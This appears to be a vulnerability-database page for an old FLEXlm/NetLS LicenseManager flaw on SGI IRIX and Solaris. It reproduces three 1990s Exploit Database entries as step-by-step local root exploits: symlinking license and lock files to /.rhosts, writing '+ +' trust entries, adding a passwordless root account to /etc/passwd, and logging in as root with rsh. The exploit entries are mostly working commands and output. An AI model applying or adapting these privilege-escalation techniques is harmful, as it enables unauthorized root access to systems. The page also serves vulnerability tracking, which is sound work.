Metrics
Metrics | Score | Severity | CVSS Vector | Source
V2 | 7.2 | | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected]
EPSS
EPSS is a scoring model that predicts the probability that a vulnerability will be exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 to 100 %). The higher the score, the greater the probability that the vulnerability will be exploited.
EPSS Percentile
The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile by EPSS score is more likely to be exploited than 95 % of all other CVEs. The percentile therefore serves to compare one CVE's EPSS score against the rest.
Exploit Information
Exploit Database EDB-ID: 19066
Publication date: 1996-04-04 22:00 +00:00
Author: Arthur Hagen
EDB Verified: Yes
source: https://www.securityfocus.com/bid/72/info
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to overwrite root-owned files allowing root access.
% setenv NETLS_LICENSE_FILE /.rhosts
% /usr/etc/LicenseManager &
Install...
NetLS Node-locked
Vendor Name: whatever
Vendor ID: + +
Product name: whatever
License version: 1.000
License version:
Expiration date: 01-jan-0
(in license version field put a space)
Apply
License(s) succesfully installed
% cat /.rhosts
#:# "whatever" "whatever" "1.000" "Incomplete"
+ +
If your system has remote root logins disabled, replace /.rhosts with /etc/passwd and + + with toor:0:0::/:/bin/sh.
Exploit Database EDB-ID: 19067
Publication date: 1996-11-21 23:00 +00:00
Author: Yuri Volobuev
EDB Verified: Yes
source: https://www.securityfocus.com/bid/73/info
Under normal operation LicenseManager(1M) is a program used to view and manage FLEXlm and NetLS software licenses. Unfortunately, a set of vulnerabilities has been discovered that allows LicenseManager(1M) to arbitrarily manipulate root-owned files allowing root access.
% mkdir -p /tmp/var/flexlm
% setenv LICENSEMGR_FILE_ROOT /tmp
% cd /tmp/var/flexlm
% cat > license.dat
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
^D
% ln -s /.rhosts license.dat.log
% LicenseManager &
Next click on Update, fill in the four fields with any information and click
on Apply. LicenseManager will report an error. Ignore it and exit.
% cat /.rhosts
Checkpoint file /var/flexlm/license.dat Fri Nov 22 19:05:50 1996
#
# FLEXlm license file
#
FEATURE + + blah sgifd 1.00 01-jan-0 0 blah
% rsh localhost -l root
#
Exploit Database EDB-ID: 19350
Publication date: 1998-10-20 22:00 +00:00
Author: Joel Eriksson
EDB Verified: Yes
source: https://www.securityfocus.com/bid/461/info
The Solaris License Manager that ships with versions 2.5.1 and 2.6 is vulnerable to multiple symlink attacks. License Manager creates lockfiles owned by root and set mode 666 which it writes to regularly. It follows symlinks.
bash$ ls -l /var/tmp/lock*
-rw-rw-rw- 1 root root 0 Oct 21 18:24 /var/tmp/lockESRI
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockISE-TCADd
-rw-rw-rw- 1 root root 0 Oct 21 14:29 /var/tmp/lockalta
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockansysd
-rw-rw-rw- 1 root root 0 Oct 21 18:52 /var/tmp/lockasterxd
-rw-rw-rw- 1 root root 0 Oct 21 16:40 /var/tmp/lockhpeesofd
-rw-rw-rw- 1 root root 0 Oct 21 18:46 /var/tmp/locksuntechd
And:
bash$ ls -l /var/tmp/.flexlm
total 2
-rw-rw-rw- 1 root root 163 Oct 21 19:55 lmgrd.211
There are several lockfiles created by the License Manager. It is trivial to gain root access locally through exploitation of this vulnerability.
------
#!/bin/csh -f
# Change target user name before running
#
# [email protected] 10/98
rm /tmp/locksuntechd
ln -s ~targetuser/.rhosts /tmp/locksuntechd
exit
------
then wait a min and cat + + >> ~targetuser/.rhosts
Products Mentioned
Configuration 0
Globetrotter>>Flexlm >> Version 4.0
Globetrotter>>Flexlm >> Version 4.1
Globetrotter>>Flexlm >> Version 5.0
Sgi>>License_oeo >> Version 3.0
Sgi>>License_oeo >> Version 3.1
Sgi>>License_oeo >> Version 3.1.1
Sgi>>Irix >> Version 3.3.2
Sgi>>Irix >> Version 3.3.3
Sgi>>Irix >> Version 4.0
Sgi>>Irix >> Version 4.0.1
Sgi>>Irix >> Version 4.0.1t
Sgi>>Irix >> Version 4.0.2
Sgi>>Irix >> Version 4.0.3
Sgi>>Irix >> Version 4.0.4
Sgi>>Irix >> Version 4.0.4b
Sgi>>Irix >> Version 4.0.4t
Sgi>>Irix >> Version 4.0.5
Sgi>>Irix >> Version 4.0.5_iop
Sgi>>Irix >> Version 4.0.5_ipr
Sgi>>Irix >> Version 4.0.5a
Sgi>>Irix >> Version 4.0.5d
Sgi>>Irix >> Version 4.0.5e
Sgi>>Irix >> Version 4.0.5f
Sgi>>Irix >> Version 4.0.5g
Sgi>>Irix >> Version 4.0.5h
Sgi>>Irix >> Version 5.0
Sgi>>Irix >> Version 5.0.1
Sgi>>Irix >> Version 5.1
Sgi>>Irix >> Version 5.1.1
Sgi>>Irix >> Version 5.2
Sgi>>Irix >> Version 5.3
Sgi>>Irix >> Version 6.0
Sgi>>Irix >> Version 6.0.1
Sgi>>Irix >> Version 6.1
Sgi>>Irix >> Version 6.2
Sgi>>Irix >> Version 6.3
Sgi>>Irix >> Version 6.4
Configuration 0
Sun>>Solaris >> Version 2.4
Sun>>Solaris >> Version 2.5
Sun>>Solaris >> Version 2.5.1
Sun>>Sunos >> Version 4.1.1
Sun>>Sunos >> Version 4.1.2
Sun>>Sunos >> Version 4.1.3
Sun>>Sunos >> Version 4.1.3u1
Sun>>Sunos >> Version 4.1.4
Sun>>Sunos >> Version 4.1.4jl
Sun>>Sunos >> Version 5.4
Sun>>Sunos >> Version 5.5
Sun>>Sunos >> Version 5.5.1
References